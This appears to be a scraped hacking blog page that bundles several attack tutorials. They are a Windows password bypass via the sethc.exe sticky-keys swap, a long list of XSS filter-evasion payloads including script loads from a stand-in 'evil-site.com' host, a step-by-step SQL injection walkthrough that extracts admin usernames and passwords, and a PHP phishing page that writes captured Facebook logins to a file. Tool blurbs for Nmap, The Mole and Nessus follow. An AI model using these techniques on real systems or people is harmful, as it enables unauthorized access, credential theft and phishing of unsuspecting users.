How to hack windows password

To hack windows password you should have a live cd. If you want to hack password for xp than try through backtrack hacking its more easy but if you have windows 7 installed than continue with following procedure 

1.Use a any Linux live CD like ubuntu

2.Boot the cd

3.Now go to C drive>Windows> System 32 folder

4.Copy cmd.exe and paste it on other drive like D

5.Rename cmd.exe to sethc.exe

6.Again go to  C drive>Windows> System 32 folder

7.copy sethc.exe and paste it on other drive like E (not in D )

8.Copy the new sethc.exe file from D drive that you make it early and paste it   on    C:/windows/system32            ,it will ask for overwriting the file, then click yes

9.Now shut down and remove the live cd

10.On your PC,when the login screen appear press Shift key 5 times you will get cmd prompt

11.Type "net user", it will show all users list.

12.Now type “net user administrator password” without quotes where “password”can be any password of
your desire and administrator is user account name. If you wish to change password for other user, then just replace administrator with user name.Like if my user name cyberkey and i want to make new password to 123456789 then i have to type "net user cyberkey 123456789" without quotes.

13.Restart your pc and login with new password for my case "123456789"

14.copy the sethc.exe from E drive that we make a backup in that drive now paste it on C drive>Windows> System 32 folder ,windows will ask for overwriting the file, then click yes.

Note if you have only one drive then you can make backup the two file cmd.exe and sethc.exe into your pendrive

Read More ->>

Cross Site Scripting(XSS)

Simply put, cross site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non persistent" XSS. 

None Persistent XSS

Non persistent as the title suggests means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic coded search engine for a site. Say for example, the site search script is in this format:

Site.com/search.php?search=text here



Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

Simply echoing your search string straight onto the page without performing any validation checks. What if we were to alter the search string to display html of JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font>


Site.com/search.php?search=<script>alert("XSS");</script>


If no sanitation checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used to display anything you want. 

However, since the attacker can only display code on their own pages, this isn't much of a threat to other users. Although if the string was turned into Hex the search string may be slightly more hidden and with a little deception could be used to trick users into thinking the link is legitimate. 

Next there's persistent XSS


Persistent XSS



Again as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will be able to see permanently. In order for these to work, the code has to be made to store itself on the sites server somehow, which can be hard to find. 

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page all.php. The register process wasn't sanitized at all, so all a user had to do was simply register with a username containing HTML or JavaScript code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would effect all.php as well as the forums and anywhere where the username was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found off sites designed to help novices. 

With both of these attacks, it is also possible to run malicious code from another site again making the possibilities of attack endless. Javascript has a lot of features the are not well know, such as changing the images on sites from images[number].src and anyone who uses myspace will know the CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site:

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


Getting Past Basic Protection 



So what if a site owner knows about XSS, but has provided some but very little protection against it? Well, this is where CharCode comes in. Char code is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but still get displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if it is vulnerable: 

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>


This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one of two of them work, so you need to try to eliminate some of them to text which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can see, each provides a slight variation to try to beat character blocking. 

XSS could also be hidden in a none existent image. This code below would run malicious JavaScript disguised as an image: 

<img src="javascript:alert('XSS');">


What if quotes are blocked? No problem, just inject the site like so: 

<img src=javascript:alert(&quot;XSS&quot;)>


The &quot; will be interpreted in html as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable. 

<img src=javascript:alert(String.fromCharCode(88,83,83))>


The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic code that was invented to allow all characters to be available to everyone e.g. for different languages such as chinese character symbols. And ASCII has a similar purpose. You can go to http://www.asciitable.com to view the HTML code needed for ASCII code. This below shows the whole code in ASCII form:

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


As you can tell, this will beat many filters as the code is basically unrecognisable. However, translating the code can display what it was designed to do. Next for Unicode, again this makes the text unrecognisable but works the same:

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>


If the site has a limited amount of characters allowed, this probably won't be useful. As mentioned previously, hex can also be used for XSS. The example below shows this:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>


Again unrecognisable which makes it a great XSS to use. 

The list of possible XSS attacks is endless and is far more than is covered here. With so many ways to bypass security checks site owners have to work harder to try to protect their sites. As well as web forms being used on most sites these days allowing users to enter code which will be stored somewhere and inevitably viewed by someone else XSS can be used for almost anything. With practise XSS can be used to run a hidden cookie stealer which a user will view and allow you to steal their login info or if sessions are used perform "session hijacking" where you steal their session data and again log in as them. To the simple defacement of a website through HTML or Javascript. XSS is definitely an attack method which should be studied well as it provides such a common method of attack. 

As mentioned above, the list of possible XSS attacks is endless, there isn't enough room to mention them here, but I will finish with some more XSS examples that may effect a vulnerable site. 

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability 

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT> - again beat checks using Javascript



<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

<BGSOUND SRC="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 

- base64 encoding, another form of encryption, this one is less likely to work. 

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method, here you rename your .js to .jpg, but since you have the script tags it will still be read as a js file. 




The list goes on and on, the best way is to just try them yourself. A lot of the time incorrectly written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or "<" to the start or end of the code for example or view the source of the page for code tags you need to close. Adding a "'>" to the end then starting your own malicious code. Well, that's the end of this tutorial. For more XSS attack example just use google as more of these are being though up every day. Soon you should even be able to invent your own.

Read More ->>

How to hack Website using SQL Injection

What is SQL Injection?
SQL Injection is one the common Web application vulneraility that allows an attacker to inject malicious SQL command through Parameter or any Input box that is connected to Website Database. In SQL Injection an attacker finds  (SQLi) vulnerablility and Inject Malicious code through various techniques and Hack the website Database this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation. Using SQL Injection attack method an attacker can get complete DB of website - User ID and Password can be exploded, an attacker can also Shut down My SQL Server. An attacker can modify content of website & bypass login. 


SQL Injection Dorks. Download Vulnerable Website. (Use Google to find Vulnerable Website) Firefox with Hack bar add-on. 7 Most Important Addons for Hackers Little bit understanding of SQL Injection and URL Fresh Mind to Understand it

1. Find Vulnerable website.

      An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. Dorks with Parameter URL.

Click here to download Huge list of SQL Injection Dorks
Search any one dork on Google, For Eg. m using inurl:index.php?id=

Basically I always use Google to search Vulnerable websites. and if you want to Hack particular website, then you have to scan it or manually check every page, URL to identify whether it is vulnerable or not.

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites. the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=  Yeah, Definitely it will have because this all website having SQL Parameter into their URL. So simply Google searched it. 



Find SQLi Vulnerabilities
Open any website URL which have SQL Parameter. like Dorks
Put Single Quote at the End of the website URL (')
For Eg.: www.targetwebsite.com/index.php?id=2'
If the page remains same or Not found then it's not vulnerable and if the page shows any type of Error related to SQL String or MySQL Error then the website is vulnerable to SQLi. For Eg. I got this Error .:

An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1


This means the website is vulnerable to SQL Injection. *Cheers*

✔ Find the number of Columns.


Yehfii !! We found SQL Injection Vulnerable website now it's time to find no. of Columns present in the Database.
To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message. Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below Example :-
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3


And Suppose above Method doesn't work then use below method.
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--

If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this.: An error occurred  Unknown column '12' in 'order clause'.

# This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.


www.targetwebsite.com/index.php?id=8 Order by 1  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6    (Error)
.........................Try Until you get an Error..........................

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB. So now here I found number of columns in my DB :- Number of Columns = 11


✔ Find the Vulnerable Column.
Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence". And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-

www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--

And Suppose above Method won't work then use below method:-

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--

And Once if the Query has been Executed then it will display the number of Column.


In the Above result, I found three vulnerable Columns 2,3 & 4. let take 2 as our tutorial Well ! We found Vulnerable Columns, Now Next Step.

✔ Finding version, Database and User.
Now this time we've to find out website Database version, User, Database Name & some other Information, Just replace Vulnerable Column no. with "version()"

For Eg. 
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--


And now Hit Enter : and you will  get result.

- See more at: http://hackw0rm.blogspot.com/2013/04/how-to-hack-website-using-sql-injection.html#sthash.0jY1tFYr.dpuf

Now again do the same replace Vulnerable column with different query like :- database(), user()

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--


               And Suppose above Method won't work then use below method 


www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--


✔ Finding the Table name.
Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For Eg. 
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


Now hit Enter and you can see Complete Table of Database.





Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :-  userDatabase. Let us choose that table userdatabase and Go on Next step.

✔ Finding the Column name.
Now same to find Column names, replace "group_concat(table_name) with "group_concat(column_name)" and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Do not hit Enter now,First of all Convert  table name into Mysql Char String()
Install the Hackbar add-on in Firefox Click here to Download
After Installing you can see the toolbar, and if you can't then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.

Enter the Table name you want to convert it into Mysql Char 

Now you can see the Char like this :-

Copy and paste the code at the end of the url instead of the "mysqlchar"

www.targetwebsite.com/index.php?id=-8 union select 1, group_concat (column_name), 3,4,5,6,7,8,9,10,11 information_schema.columns FROM WHERE table_name = CHAR (117 , 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101) -

And Now Hit Enter and you will be able to see the column names like this

Great Here we found Username and Password Column :D.

✔ Explore Database & Hack it.
                     Cool! now you know the next step what to do :D..... get the ID and Password of Admin user using this Command into URL.Now replace  group_concat(column_name) with group_concat(username,0x2a,password). or any other Column name you want to get Data.

For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--


If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.

Read More ->>

Facebook Phishing

Hack facebook using phishing page

STEP 1: Creating Phishing.php file:
1 Simply copy the following script and save it as phishing.php

<html> <body> <? php $ handle = fopen ("password.txt", "a"); fwrite ($ handle, $ _POST ['email']) fwrite ($ handle, "\ n"); fwrite ($ handle, $ _POST ['pass']) fwrite ($ handle, "\ n"); fwrite ($ handle, "\ n"); fclose ($ handle) header ("Location: https:// / www.facebook.com/login.php?login_attempt=1 ") exit;?> </ body> </ html>


STEP 2: Creating index.html page :

2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for :"action" in it and replace the highlighted part (as in the following screenshot) with phishing.php .

STEP 3: Now create a completely blank text file with name password.txt.

Now you have all the following three files with you :

1. phishing.php

2. index.html

3. password.txt

If you do not have your own web hosting account Upload file on 

my3gb.com

ripway.com

110mb.com

000webhost.com

Read More ->>

Nmap

Nmap
I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly Nmap scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters / firewalls are in use, and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a "map" of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.

Download Nmap

Read More ->>

The Mole v0.3 Released For Download – Automatic SQL Injection Exploitation Tool

The Mole is an automatic SQL Injection exploitation tool. All you need to do is provide a vulnerable URL and a valid string on the site you are testing and the Mole will detect the injection and exploit it, either by using the union technique or a boolean query based technique.

We did mention the Mole when we first heard about it back in 2011 - The Mole - Automatic SQL Injection SQLi Exploitation Tool.

Download for Windows

Download for Linux

Read More ->>

Nesus

Recently went closed source, but is still essentially free. Works with a client-server framework.Nessus is the worlds Nessus Remote Security Scanner most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are Realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. 

Download Nesus

Read More ->>